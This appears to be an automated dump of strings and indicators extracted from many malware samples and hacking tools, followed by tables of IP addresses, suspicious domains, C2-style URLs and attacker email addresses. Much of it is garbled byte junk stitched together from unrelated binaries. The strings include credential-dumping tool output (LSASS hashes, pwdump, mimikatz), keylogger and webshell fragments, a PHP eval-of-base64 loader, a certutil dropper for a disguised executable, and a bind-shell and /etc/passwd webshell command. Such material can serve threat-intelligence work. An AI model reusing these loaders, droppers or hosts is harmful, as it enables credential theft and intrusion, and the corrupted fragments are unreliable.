Unavailable d$1h
Unavailable f.{n'
Unavailable dh!-
Unavailable -=[ hidepe ]=-
Unavailable 0xc]
Unavailable -~ln
Unavailable ois9%z
Unavailable whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
Unavailable jhtw
Unavailable remove_keydownprotecteddatam_hotkeysget_hour\
Unavailable c+a[ye
Unavailable uhlsqz
Unavailable "r"_|()
Unavailable c3{m
Unavailable 15[l$v
Unavailable l$`i
Unavailable rmd;
Unavailable uwcd>:
Unavailable %):kvp
Unavailable te8a
Unavailable i*7w
Unavailable hpsc
Unavailable d85c
Unavailable faox
Unavailable outputdebugstringa
Unavailable "=t$
Unavailable =n4_
Unavailable >c~!l!
Unavailable messagebox`
Unavailable &"y]zj
Unavailable d$0l
Unavailable ^j`juuna
Unavailable 3m_t
Unavailable 0.14 (
Unavailable z0\-
Unavailable ~@1906dark1996coder@shemptyrecyclebinamcisendstringaadd_shutdownget_savemysettingsonexitget_specialdirectoriesclient.myavenger by nhtgreameh
Unavailable u#*7*qc
Unavailable %-swi
Unavailable getsysteminfo
Unavailable ?jb?
Unavailable \\%i@
Unavailable %a ^
Unavailable b>%x
Unavailable y*5sy
Unavailable g%[+
Unavailable w|%,
Unavailable !p`h
Unavailable getdateformatex
Unavailable d4+#z
Unavailable d$!f
Unavailable d$lf;
Unavailable bp(=>?g
Unavailable qvps
Unavailable k.$r
Unavailable +>de
Unavailable neolite executable file compressor
Unavailable =q!h
Unavailable 0t{a+
Unavailable m&ix
Unavailable ?01wb
Unavailable tlsgetvalue
Unavailable wgps
Unavailable q_&u29b
Unavailable ]a+|
Unavailable #w5=dhe
Unavailable ;rocau3
Unavailable do/=
Unavailable .:toj
Unavailable qczt
Unavailable &>sr
Unavailable "rp(
Unavailable word.execookie: /search?hl=en=q=%s\\winsend.d2
Unavailable tobom
Unavailable <.pv1
Unavailable e!qaz4rfv:&:-:=:j:o:\\:m:r:6)6/666;6n6w6^6c6t6y6666q6v6b6g6~60%0,010a0f0k0\\0a0f0w0|06!6(63686e6j6w6\\6i6n6{63 3%33383=3j3r3`3e3o3t3~34 4'40454:4g4m4r4_4e4j4w41#1(141=1b1n1t1y1e1k1p1|1?(?2?<?c?j?q?x?_?f?m?t?{??#?*?1?8???f?m?t?[?b?i?p?w?6)6/646@6f6k6w6]6b6n6w6|64#40454:4g4l4q4^4c4h4u4z4<\"<'<3<8<=<i<n<s<_<d<i<u<z<>%>/>9>@>g>n>u>\\>c>j>q>wtzdae060>0e0k0p0\\0b0g0v0|04#4-474a4k4u4\\4f4p4z47\"7,767@7j7t7^7h7q7{7;\";';4;e;j;w;k;p;};;0;;;f;q;\\;g;r;};
Unavailable @w6_
Unavailable 1.24
Unavailable p?<s
Unavailable 't37
Unavailable ]1"8
Unavailable l_ge
Unavailable 9<s%
Unavailable $0dd
Unavailable ,^py,
Unavailable ]*z"
Unavailable .?avagentkernel@@.?aviagentmodule@@u
Unavailable malloc
Unavailable pklite copr. 1991
Unavailable 5[uom
Unavailable prag
Unavailable getstdhandle
Unavailable m&g
Unavailable c>@cox
Unavailable tl`_
Unavailable eaqz
Unavailable elicen40.dll
Unavailable a_a^a]a\]
Unavailable d$`f;
Unavailable {hellor
Unavailable k,q/y
Unavailable d$da
Unavailable 40@"
Unavailable t$8h+
Unavailable pjb,
Unavailable firefox.exe\
Unavailable flsfree
Unavailable ;mj6
Unavailable [;b.
Unavailable !2#m
Unavailable ttw"y
Unavailable j*,^
Unavailable lca<e3
Unavailable imc3
Unavailable bakakle
Unavailable 2w-t
Unavailable yqx4@
Unavailable 'xdx
Unavailable /* format_version=1,+
Unavailable l7#kt
Unavailable t0+b
Unavailable g+l1
Unavailable =i'/
Unavailable lo0c
Unavailable ;1?|
Unavailable twqzw
Unavailable e8rp4
Unavailable |$<|
Unavailable 6~eb
Unavailable zecho -----begin certificate----- >echo -----end certificate----- >>certutil -decode vc92ny9tsxzmnk5jly8voulqutfvrlfnqtzmlysvdjljath2l0zunxjbuujjatfra1nfaux6k2hwss8vl1njme44bklcqu9pzc92ny9ustjjskpbqufbqxp3rw1mv3hcsmkyc1ltwxr6s0vttdqxl0r6txhnatl4smlwc0luwwxmsuuyslf4afzwbgrcvkvgvlfwwkjwmglcn1bbqufbqklnmlfryufdne1bqufbrw1mnkvttmnpq0psq1jnavvra1pfbu5rn0jkatlstwprwfbgqu1bu0lsrpd3ovn3flalvtnkllq0xnngtov1biy0vovhrot0zud25cwgn0ws9bcedmr28rk01owm85nm9xmlnny1u5atgrstbvnkfob1fotzrhqwdtuelevmlqald0tk90b2fmn01eswjuqkf5t0pybtb4bfvhrtbzwefwoxvonhbkqnrrs0vfwwvbsee2tdfzu0c5a2zftec3qwd4wtbyy1l3zzb6qufxs09jze9wqvhek3lns3lsr3b5q1ljr1njdfnsegzkwulvvknfdezpvjrjulderul1qxpkz2pcqwdsd0vantdll.exepkacrord32.exepksetup=ntdll.exe\x0d\x0asilent=1\x0d\x0asetup=%temp%\\acrord32.exe\x0d\x0aleave getcommand!perform exe success!perform exe failure!entry sendcommandreq!leavedealupfile!entry postdata!leave postfile!entry postfile!\\unknow.zipthe url no respon!control_rundll/cxpid/submit.php?sessionid=/cxgid/e21bc52bea2fef26d005cfe21bc52bea39e435c40cd8 -,l-,o+,q-,r-,y-,s-u
Unavailable bbs<

PATTERNS:IP4S

Count IP Code Alpha2 Description
1 30.40.50.60 840 us United States
1 1.2.1.0 156 cn China
1 255.255.255.255 limited broadcast
1 132.147.96.202 702 sg Singapore
1 1.1.4.0 156 cn China
2 10.0.0.1 private network
2 0.0.0.0 software
2 192.168.0.254 private network
1 112.74.111.42 156 cn China
1 176.53.127.194 792 tr Turkey
1 144.76.70.213 276 de Germany
3 192.168.1.1 private network
1 1.8.0.6 156 cn China
1 210.73.64.88 156 cn China
1 1.1.0.0 156 cn China
1 1.2.3.4 36 au Australia
1 192.168.10.4 private network
1 192.168.1.101 private network
1 192.168.0.2 private network
1 142.91.76.134 840 us United States
5 192.168.0.1 private network
1 192.168.0.3 private network
27 127.0.0.1 loopback
3 12.12.12.12 840 us United States
1 2.0.0.0 250 fr France
1 60.15.124.106 156 cn China
1 1.8.0.12 156 cn China
1 37.49.224.144 233 ee Estonia
1 9.9.9.9 840 us United States
1 10.0.1.200 private network
1 192.168.1.100 private network
1 1.1.8.0 156 cn China
1 1.9.0.2 458 my Malaysia
1 1.1.1.0 36 au Australia
1 1.1.7.0 156 cn China
3 199.91.173.45 840 us United States
1 1.1.9.0 156 cn China
1 12.12.12.254 840 us United States

PATTERNS:LINKS

Count Link Description
1 any.net
1 exists.show
1 dogmile.com
1 bindresvport.ch
1 f.bm
1 commcgi.cgilinkconf.netredirserver.netswupdt.com
1 www.tzddos.com
1 cookie.read
1 www.target.com
1 joyappstech.biz
1 tasksvr.nc
1 sef.com/hack%20mobaile/addsms.phphttp
1 http.open
1 http://ftp.powernet.com.tr/supermail/debug/k3
1 www.xxx.com
1 warrior.org
1 sget.open
1 http://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http
1 sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera
1 http://www.w3.org/2001/xmlschema-instance
1 http://www.w3.org/tr/html4/loose.dtd
1 d00r.py
1 https://www.yammer.com/favicon.ico';beef.net.send
1 tty.host
1 shell.run
1 gmbeef.net.requestuagent.search
1 http://www.videolan.org/x264.html
1 md5cracking.com
1 http://www.rohitab.com/elsif
1 proceeding.click
1 xpost.open
1 http://www.visvo.com/en/webmasters.jsp;bot
1 http://www35.websamba.com/cybervurgun/
1 http://www.java.com/en/download/installed.jsp?detect=jrec
1 encryptpe.com
1 hmrtqflash.events
1 http://google.com/search
1 gmail.com
1 http://iframe.ip138.com/ic.aspusage
1 http://www.israirairlines.com/?mode=page&page=14635&lang=eng
1 http://www.xfa.org/schema/xfa-locale-set/2.1/subform
1 www.encryptpe.com
1 reserved.net
1 out.name
1 pentestmonkey.net
1 evilc0der.com
1 xxx.xxx.xxx.xxx
1 ftp.net
1 greensky27.vicp.net
1 http://ayyildiz.org/images/whosonline2.gifejder
1 www.cnasm.com/gui/error.htmlc
1 hotmail.com
1 http://kerinci.net/?x=decode//
1 store.py
1 spygrup.org
1 wscript.network
1 http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif
1 cbs.pl
1 http://www.gimpster.com/wiki/phpshell
1 http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png
1 www.simorgh-ev.com
1 0.work
1 come.to/f2f
1 in.read
1 conn.open
1 win.com
1 www.patching.net
1 stream.read
1 inputsenhacartaocaixa.com.br
1 http://ftp.powernet.com.tr/supermail/de
1 tempuri.org/zhoupin_cleavergetshadyprocessgetsystemantivirusesantivirusdetectorcom+
1 http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid
1 http://opensource.org/licenses/osl-3.0.php
1 https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly
1 objshell.run
1 replacewss.run
1 s.ng
1 http://www.wasabii.com.tw
1 http://www.vip80000.com/hot/index.htmlgetconnectstringcncert.safe.ssclone.dll
1 bytelinker.com
1 http://www.weigongkai.com/shell/if
1 http://websafe.facaiok.com/just7z/sx.asp?u=
1 targetservice.name
1 http://require.duapp.com/session.phpif
1 www.blacklogic.net
1 s.inc/c
1 ihateclowns.com
1 http://www.facebook.com/comment/update.exeshared
1 oshell.run
1 u.am
1 http://www.tzddos.com/
1 localhostiis.run
1 autoitscript.com
1 yourserver.com
1 members.3322.net/dyndns/update?system=dyndns&hostname=http
1 attacker.com
1 command.com
1 x22www.fopo.com.ar
1 wss.run
1 http://da.mmarket.com/mmsdk/mmsdk?func=mmsdk
1 backconn.pl
1 visvo.com
1 mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback
1 http://michaeldaw.org
1 sef.com/hack%20mobaile/addimsi.phphttp
1 sef.com/hack%20mobaile/addnewsms.phphttp
1 http://www.xfocus.net
1 s.hm
1 directive.page
1 ofile.name
1 ar.tl
1 http://www.xmlspy.com
1 file.zip
1 http://www.cnhonker.com
1 downloaded.zip
1 update.konamidata.com/test/zl/sophos/td/index.dat?internet
1 www.google.com/webhpcoded
1 metasploit.com
1 bindshell.py
1 wmplog21t.sqmwmplog15r.sqmwmplog09c.sqmkbd_%%s_%%02d%%02d%%02d%%02d%%02d.cat
1 md5.new
1 http://xa.xingcloud.com/v4/sof-everything/http
1 winhelpwreadprocessmemorywshshell.run
1 se.com/o.js
1 http://blog.gentilkiwi.com/mimikatzbenjamin
1 http://www.rootkit.net.cn
1 wwp.mirabilis.com
1 mozilla.org/supports-string;1
1 trueobjshell.run
1 pacucci.com
1 antisocial.com?raiz=rootdigo
1 h4cker.us
1 http://upx.sf.net
1 mozilla.org/file/directory_service;1var
1 02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php%botid%%botnet%bc_removebc_addhttp
1 http://extcitrix.we11point.com/vpn/index.php?ref=1%systemroot%
1 http://code.google.com/p/b374k-shell$_=str_rot13
1 sef.com/hack%20mobaile/addhistoryinternet.phphttp
1 www.ak74-team.net
1 window.open
1 automator.app/contents/macos/docklightioreg
1 email.com
1 https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
1 killprocess.ch
1 datapipe.pl
1 alturks.com
1 http://www.cyberlords.net
1 http://www.4ngel.net
1 90sec.org
1 userevent.app
1 http://ferruh.mavituna.com
1 counterhack.com
1 http://rst.void.ru
1 21cn.com
1 this.target
1 insreader.read
1 http://locus7s.com/
1 socket.cat
1 http://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename
1 http://www.gammacenter.com
1 exit.post
1 http://www.crsky.com/soft/4818.html
1 wscript.shell
1 asmodeus.pl
1 tr.mx
1 viii.net
1 http://wpa.qq.com/msgrd?v=1&uin=312016&site=www.cnasm.com&menu=yesexplorer.exehttp
1 mozilla.org/network/io-service;1
1 http://hi.baidu.com/0x24quser_namefromwwhered
1 oscript.run
1 www.expdoor.com
1 http://tuginsaat.com/wp-content/themes/twentythirteen/stats.phpr
1 http://upx.tsx.org
1 janker.org
1 http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin
1 www.xxx.com/xxx.exe
1 http://www.microsoft.com/technet/security/current.aspno
1 http://google.com/mozilla/5.0
1 static.ak.fbcdn.net
1 j.ls
1 hotmail.ru
1 corp.microsoft
1 http://pastebin.com/download.phpxcurl
1 msn.com
1 cmd.so/challengecpu
1 http://pastebin.com/raw.phpif
1 clantemplates.com
1 secureideas.net
1 masterhr.com
1 vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu
1 failed.global
1 http://www.baidu.com/fuck.asp?a=
1 sef.com/hack%20mobaile/addvcf.phphttp
1 os.run
1 hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail
1 s.eu
1 http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text
1 ddos.tf
1 http://www.luocong.com
1 xfocus.org
1 2.0.0.1.py
1 header.id
1 dal.net
1 lines.sh
1 www.alturks.com
1 http://www.n-c-c.6x.to
1 http://www.security-teams.net/index.php?showtopic=azrailphp
1 address.run
1 sef.com/hack%20mobaile/addalllogcall.phphttp
1 consultoreslegales.com.mx
1 error.new
1 aventgrup.net
1 inc.you
1 sef.com/hack%20mobaile/addscreenshot.phphttp
1 www.victime.com/index.php?page=http
1 http://blog.weili.me
1 ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick
1 process.id
1 http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest
1 www.badguy.net,cname,1800,host.badguy.net
1 failed.in
1 expdoor.com
1 www.webtoolmaster.com
1 storefc.py
1 www.cnasm.com/gui/help.htmlhttp
1 www.gimpster.com/wiki/phpshell
1 http://www.site.com/test.dll?user=%username&pass=%passwordusername
1 temp.pl
1 https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr
1 www.diamondcs.com.au
1 userevent.app/contents/resources/userevent.icns'osascript
1 http://www.simorgh-ev.com
1 webtoolmaster.com
1 http://freenet.am/~zombiif
1 revelationhelper.dllobjshell.run
1 http://zalexf.narod.ru/
1 www.sanalteror.org
1 http://www.chinesehack.org/global
1 xmlhttprequest.open

PATTERNS:EMAILS

Count EMAIL Description
1 youremail@yourserver.com
1 hacker@hacker.com
2 hernan@gmail.com free
1 revengans@gmail.com free
2 support@webtoolmaster.com
3 kingdefacer@msn.com free
1 neu-cool@email.com free
1 zehirhacker@hotmail.com free
1 ftp@ftp.net
1 cracker_prince@163.com free
2 cooleyas@21cn.com free
1 berna@consultoreslegales.com.mx
2 zalexf@hotmail.ru free
1 master@h4cker.us
1 anyone@any.net
1 shinlan@km169.net
1 atrix@irc.brasnet.org
1 glacier@xfocus.org
2 hochoa@coresecurity.com
1 tampon3-1@aventgrup.net
1 mer4en7y@90sec.org
1 priv8coder@gmail.com free
1 c0derz.org.uavint21h@c0derz.org.ua
1 neagumihai@hotmail.com free
1 bot@visvo.com
1 mr_o@ihateclowns.com free
1 shopen@aventgrup.net
1 ambrop7@gmail.com free
1 da@fsafetyssl.security
1 xxx.exe@ddns.oray.com
1 john.barker446@gmail.com free
1 tim@counterhack.com
1 success%s@gmail.com free
1 avsupport@autoitscript.com
1 rhfactor@antisocial.com free
1 laudanum@secureideas.net
1 pass._shell.exeftpcwaitingpassword@members.3322.net
1 user@alturks.com
1 pentestmonkey@pentestmonkey.net
1 zhouzhen@gmail.com free
2 xb5@hotmail.com free

PATTERNS:TAGS

Count TAG Description
132
1 iebars
1 - server ip:
1 3.3k
1 \">web root
1 rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0);
1 http://www.4ngel.net
1 deleting with errors:
1 keystroke collector
1 \"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"
1 unsigned
1 owner/group
1 ip:
1 \".$_server['server_signature'].\"
1 20121
1 $out
1 v
1 file size mismatch
1 20121.dll
1 00001001
1 null
1 \".mysql_error().\"
2
1 ** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp cnformsyncexfbccnformvoidfbc yyyyyyyyyyyyyyyy?a73957838_2@@yaxxz?a84884@@yaxxz?b823838_9839@@yaxxz?e747383_94@@yaxxz?e83834@@yaxxz?e929348_827@@yaxxz7 stringindexi msvcp5%d.dllactxprxy.getproxydllinfoactxprxy.dllgetclassobjectactxprxy.dllregisterserveractxprxy.dllunregisterserveryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy191h1a1november ababababababjanuary october september c:\\users\\rmgree5\\m svrg.pdbw32pservicetablein formareleasefastmutexr0omp4arh.text\ getmappedfilenamewall_firewalls@ failed to get windows versionl \\\\%s\\mailslot\\%s%d-%d-%d %d:%d:%d zlsasrv32.dll!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!%s %02x %sviewers5 x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllsystem\\currentcontrolset\\services\\usbstor\\enumsystem\\currentcontrolset\\services\\partmgr\\enum\\agentcpd.dllagentcpd.dllpadupdate.exedll_installer.dll\\restore\\q:\\__?__.lnksoftware\\microsoft\\msnetmng\\shelldoc.dllfile size = %d bytes\\msagentglobal\\rpcmutexglobal\\directmarketingnls_933w.dllb kfacquirespinlockhal.dllread_register_uchar@ $aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaao hnetcfg.hnetgetsharingservicespagehnetcfg.icfgetoperationalmodehnetcfg.icfgetdynamicfwportshnetcfg.hnetfreefirewallloggingsettingshnetcfg.hnetgetshareandbridgesettingshnetcfg.hnetgetfirewallsettingspagei386\\desertwinterdriver.pdbperforming ur-specific post-install...timeout waiting for the \"caninstallnow\" event from the implant-specific exe!straitshooter30.exestandalonegrok_2.1.1.1m p32.sysunilay.dlli sys\\tdip.dbgdip.systdip.pdbm msrstd.pdbm parmsndsrv.dbgm \\systemroot\\c volrec.pdbv backsnarf_ab25-c %s 127.0.0.1\" scripme -f -t jackpopin4 '&command too long! what the hell are you trying to do to me?!?! try one smaller than %d bozo.error from ourtn, did not find keys=target in tn.spayedourtn -d -d %s -w 127.0.0.1:%d -i %s -p %d %s %s#provide hex or ep log as command-line argument or as inputprint \"gimme hex: \";if ($line =~ /reg_dword: (\\d\\d:\\d\\d:\\d\\d.\\d+ \\d+ - )?(\\s*)/) {if ($_ =~ /installdate/) {if (not($cmdinput)) {print \"$hex in decimal=$dec\\n\\n\";%s: abort. code is %d. message is '%s'%s: %li b (%li%%)no winsock%s: %s file '%s'peer: connectread: write%s: done!recv_ack: %s: service not supplied by providersend_request: putmsg \"%s\": %sport undefinedrecv_ack: %s getmsg: %s>> %d -- %d%s [infile] [outfile] /k 0x[%i character hex key]
2 keystroke logger plugin.
1 ??????????????????:
1 ru24postwebshell - \".$_post['cmd'].\"
2 execution php-code
1 &nbspd&nbsp
1 lama's'hell v. 3.0
1 %s:%suser:password@host --> %s:%s@%sxp3 usage: %s [-h] [-v] [-t target] [-u username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll k4dll.dllthe windowaeba21fa-782a-4a90-978d-b72164c80120a8a88c49-5eb2-4990-a1a2-0876022c854f
1 eval(request.form('#')+'')
1 a}xzv&3 "j4j xh`f d+`acrxe @sda z/
1 20120
1 can't backdoor host!
3 0
1 8. x forwarded for ip -
1 clipboard data captured
1 \"+strcut(convertpath(list[i].getpath()),7 \"reg add \\\"hkey_local_machine\\\\system\\\\currentcontrolset\\\\controldie(\"\\nwelcome.. by this script you can jump in the (safe mode=on) .. enjoy\\nmode shell v1.0
1 :: enter ::
1 casus 1.5'in url'si
1 com 6 is success
1 laudanum kill nc
1 upload - shell/datei
1 /cmd.jsp
1 type
1 20120_cmddef.xml
1 go execute
1 /var/cpanel/accounting.log
1 plugin/utility
1 tftpportttftpd32backgroundsoftware\\tftpd32e accessories\\wordpad.exegorillanation.combefore editing the content of a cookie, you should close all windows of internethttp://nirsoft.cjb.neta @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n
1 user info:
1 404 not found
1 /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run
2 qwgetlog
1 windows (user/win32)
1 login error
1 turn logging of all keys on|off
1 > 10k
1 copier un fichier
1
1 com isn't success
1 error:
1 execute file:
1 /etc/passwd
1 winrar sfx module
1 \".mm(\"eval php code\").\"
1 &nbspm&nbsp
1 execute system commands!
1 :: aventgrup ::.. - sincap 1.0 | session(oturum) b
1 spn2.jar
1 \"; die; system($cmd);xb5@hotmail.com
1 ${t}mysql cilent:
1 \".$lang[$language.'_text26'].$arrow.\"
1 delete
1
1 enjoy, bl1nk
1 yes
1 14.4.0
1 index of /dummy
1 server-status variables:
1 r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%3tujaboaopba(vxf{p'tsowa.i,1niwm(2004et2054stte5356496478yi%a%%a%%a%%a%cvld3,5314,004,6211,931,,,011394617,983,1154,5,1,,1,1,13,08,4304,10ovel04erveeieeem)h))b(ihsae;u%04b8u%1c08u%0e50u%a000u%1010u%4000u%20afu%0006u%2478u%0020u%1065u%210ncbcaocta.ye0201010030004a033102090;na66u%0(ec'h{iis%%a%%a%%a%%a%frs1,,8187,1,4,11,91516,,61,,10841,1,13,,,11248,01818849,23,,,,791meits0e810p0y989,0,e'fm692e58376057784234633a)(u/dr.phplaunchjnlpclsid:cafeefac-dec7-0000-0000-abcdeffedcba docbase classid63aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
1 execute command:
1 erebus
1 ${t}wordlist generator:
2 1
1 jo+ wtv~ x-3an ~
1 ansi
1 keystroke logger lp plugin
1 bytelinker.com
2 current directory
1 linux shells
1 replace >
1 system type:
1 move_logs.phpfiles/cron_updatetor.php>12-sep-2012 23:45
1 [ $folder ]
1 server is:
1 md5cracking.com crew
1 get keystroke log
1 '.$key.'
1 failed to set file time
1 dump
1 com 7 is success
1 hahahaha
1 tryag team - tryag.php - edited by kingdefacer
1 19-sep-2012 07:06
1 xxxx
1 \">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>>
1 \"reserved for future use.\"
1 link
1 this will reload the page... :(
1 not found
1 \".htmlspecialchars($encoded).\"
1 click here to exploit
1 bind /bin/bash at port:
1 liz0zim private safe mode command execuriton bypass e :=) :
2 %temp%
2 &nbsp;
1 kimim ben :=)
1 login information captured
1 #worst @dal.net
1 [$username]
1 go.cgi
1 >}s%,1{bc'3g7j}gfoh],kfvqbla;{dxdisplayobjectcontainerxtime2(hmrtqflash.events:eventdispatcher$flash.display:displayobjectcontainer_e_-___-__zvijbfrandom-_e_-_-_-__e_------817677162_e_-__--[vnnzz5:unpad: invalid padding value. expected [writebyte/enumeratefonts_e_---___f(foj4 a9 3e af d5 9aq fa 14 bc f2 a0h ea 7ffj a58 a3 b1 bd 85 db f3 b4 b6 fb b2 b4 14 82 19 88 28 d0 ea 2 2bs 25 26p 20 3f 81 0e d3 9c 84 c7 ec c3 c41m c48 d3 b5n 09 c2z 98 7b 09. df 05 5eq df a3 b6 ee d5 9 a1fg a8 837 9a a9 0a 1d 40b02 a5u6 22o 16 dc 5d f5 f5 fa be fb edx f0 87 db c9 7b d6 ac f6d 10 1aj24 aa 17 fb b0 96d dbn 05 ee f6 0f 24 d4 d0 c0 e4 96 03 a3 03 20/ 04 40 db 8f 7fi a6 dc f5 09 0fwv 1fq b3 94 e3 3e efw e6 aa9 3a 5b 9e2 d2 ec af6 10c 83 0f df bb fbx af b4 1bv 5c dd f8 9br 97v d0u 9eg29 9b 01e c85 86 b0 09 ec e07 afcy 19 e5 11 1c 92 e2 da a9 5d 19p 3a bf ab d6 b3 3fz b4 92 ff e1 27 b a9 88 b8 f0 ebld 8e 08 18 11p ee bfk 15 5bm d6 b7 ceh af 9c 8f 04 89 88 5e f6 ed 13 8en1p 86vk bc w f4 c8 16pv 22 0a bb eb 83 7d bc 89 b6 e06 8b 2a dc e6 7d ce. 0dh 18 0a8 5e 60 0c bf a4 00m 00 e3 3b7 c6 e3 8e dc 3br 60l 94h d8 aa7k5s 0d 7fb 8b 80p e0 1bp ebt b5 03ze d0o 2a b97 18 f39 7c 94 99 11 ky 24 8e 3e 94 84 d2 00 1eb 16 a4 9c 28 24 c1b bb 22 7d 97c f5 ba ad c4 5c 23 5d 3d 5c a7d5 0c f6 ea08 01 3a 15 3b e0 1a e2 89 5b a2 f4 ed 87o f9l a99 124 27 bf bb a1c 2bw 12z 07 aa d9 81 b7 a6-5 e2 e 16 bf a7 0e 00 16 bb 8fb cbn fc d8 9c c7 ea ac c2q 85n a96i d1 9b fc8 bdl b8 3ajf 7b adh fd 20 88 f ml aej 3b c7 bfy ef f07x d3 a0 1e b4q c4 be 3a 10 e7 a0 fe d1jhp 89 a0sj 1cw 08 d5 f7 c8 c6 d5i 81 d2 b 24 90 ed cep c8 c9 9b e5 25 09 c6b- 2b 3b c7 28 c9 c62 eb d3 d5 ed de a8 7f a9mns 87 12 82 03 a2 8a 3a a2l dfa 18 11p 00 7f1 bbby fa 5e 04 c4 5d 89 f3s dan b5 cai 8d 0a ac a8 0a abi e6 1e 89 bb 07 dc b5 fd 0b f9 0ch ce 01 14 8dp af 24 e0 e3 d90 dd ff b0 07 2ad 0b 7d b0 b2 d8 bd e6 a7 ce e1 e4 3e5 19 0c 85 14r/ 8c f3 